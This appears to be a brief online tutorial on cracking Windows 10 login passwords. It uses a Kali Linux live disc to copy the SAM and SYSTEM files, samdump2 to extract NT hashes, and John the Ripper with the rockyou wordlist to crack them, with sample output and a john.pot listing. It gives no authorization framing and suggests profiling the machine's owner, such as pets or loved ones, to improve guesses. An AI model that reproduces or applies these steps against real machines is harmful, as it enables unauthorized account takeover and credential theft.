Break Windows 10 password hashes with Kali Linux and John the Ripper
Cracking the SAM file in Windows 10 is easy with Kali Linux. Use a Live Kali Linux DVD and mount the Windows 10 partition.
Firstly, get the SAM and SYSTEM files from the C:\Windows\System32\config folder. Copy these to your desktop directory.
Then dump the password hashes.
root@kali:~/Desktop# samdump2 SYSTEM SAM -o out
Now grab the rockyou.txt wordlist.
root@kali:~/Desktop# zcat /usr/share/wordlists/rockyou.txt.gz > rock.txt
Now I am attempting to crack the Windows user password.
root@kali:~/Desktop# john out -format=nt -wordlist rock.txt
If this is successful, this output should be printed, or something like this…
root@kali:~/Desktop# john out -format=nt -wordlist rock.txt Warning: invalid UTF-8 seen reading rock.txt Using default input encoding: UTF-8 Loaded 54 password hashes with no different salts (NT [MD4 128/128 AVX 4x3]) Press 'q' or Ctrl-C to abort, almost any other key for status password () (*disabled* Administrator) 2g 0:00:00:00 DONE (2016-03-24 12:30) 200.0g/s 354600p/s 354600c/s 18442KC/s dirk..sss Warning: passwords printed above might not be all those cracked Use the "--show" option to display all of the cracked passwords reliably Session completed
Now cat the john.pot file, this should contain cracked passwords.
root@kali:~/Desktop# cat ~/.john/john.pot $NT$8846f7eaee8fb117ad06bdd830b7586c:password $NT$31d6cfe0d16ae931b73c59d7e0c089c0:
If the password is in the wordlist, it should be cracked. This is easy, but the wordlist needs to be very large indeed to increase the possibility of cracking the password. Get as much information about the computer owner as possible. They might have used the name of their pet or loved one😳.
There is a directory here, this contains a few very large wordlists.